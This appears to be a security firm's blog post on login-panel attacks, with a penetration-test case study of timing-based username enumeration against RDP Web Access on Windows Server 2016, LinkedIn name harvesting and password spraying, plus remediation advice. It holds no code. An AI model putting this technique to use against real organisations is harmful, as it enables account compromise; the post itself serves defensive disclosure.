Username Harvesting Through RDP Web Access

credential harvesting

Login panels of any type are a common target for attackers. Being able to get in either through weak credentials or a software vulnerability will give hackers fast access to whatever is lying on the back. This information is often extremely sensitive. In addition to sensitive information, access from the outside can open up an organization to attacks on the internal network, and even lead the network to being attacked with ransomware.

Login Panel Attacks

There are many methods of attacking login panels that can help attackers reach various goals. Typically, this will be trying to get through the login panel to access whatever is behind it, but this is not always the case. Certain vulnerabilities may allow attackers to access even deeper information, such as the filesystem of the device with the login panel or database access. Often attackers will be able to accomplish many of these goals at once.

SQL Injection vulnerabilities are very common against login panels. This happens due to the way that the front-end application checks credentials against the back-end database. If this is not managed properly, attackers can create their own SQL queries and bypass the login panel or gain access to the database. This can have even more dangerous effects, such as accessing the file structure or even running commands on the host OS.

Even without a software vulnerability, login panels can be extremely valuable for attackers. Attackers can try to enumerate information from open sources to find potentially valid usernames. These can then be attacked to see if it is possible to guess one of the user’s passwords. It is also common to search through old data breaches to see if any of the enumerated logins show up.

In many cases, login panels are misconfigured to disclose information about the validity of user accounts. This happens when there is a consistent discrepancy between valid and invalid usernames. Attackers can abuse this to collect a list of known valid usernames and begin a more targeted attack

Case Study

Remote Desktop Protocol is a prime target for attackers. Being able to get access through RDP can give an immediate path to internal machines and allow attackers to begin moving through the network. This is often solely an internal service, though it can be exposed externally as well. This can be directly through the RDP service or through a web access panel

During an External Penetration Test, our team discovered open RDP ports along with an RDP Web Access Panel. This was of immediate interest, as password-spraying attacks against these can provide good value. The problem with attacking RDP is that it is a slow protocol and can take a lot of time to brute force. This means that carefully crafting a targeted attack is vital.

RDP Web Access Panels before Windows Server 2022 hold a username enumeration vulnerability. This is due to there being a time difference between valid login attempts and invalid attempts. Valid usernames will return a response much faster than invalid usernames. By waiting for 1250 milliseconds, if no response is received, an account can be marked as invalid.

Blue Goat was able to enumerate the naming convention through open sources and begin the attack. By harvesting employee names through Linkedin and other social media platforms, we compiled a list of potential usernames and began spraying them at the login panel. This allowed us to refine our list to only valid accounts before proceeding. There is publicly available exploit code and a Metasploit module available that streamlines the attack.

This vulnerability is inherent to RDP Web Access on Windows Server 2016. This problem can be remediated by upgrading to Server 2022. Microsoft supports in-place upgrades from Server 2016 to 2022, though this is not always possible due to dependencies. Configuring the network to not allow brute-force attacks and restrict offending sources can help to prevent these types of attacks if upgrading the host OS is not possible.

Defend Your Network With Blue Goat Cyber

Blue Goat can help you meet your security goals through our various types of tests. We can work with you to identify any holes in your defenses and help to harden your organization against attacks from cybercriminals. Contact us to schedule a meeting and find the right solution for your team.

Blog Search

Social Media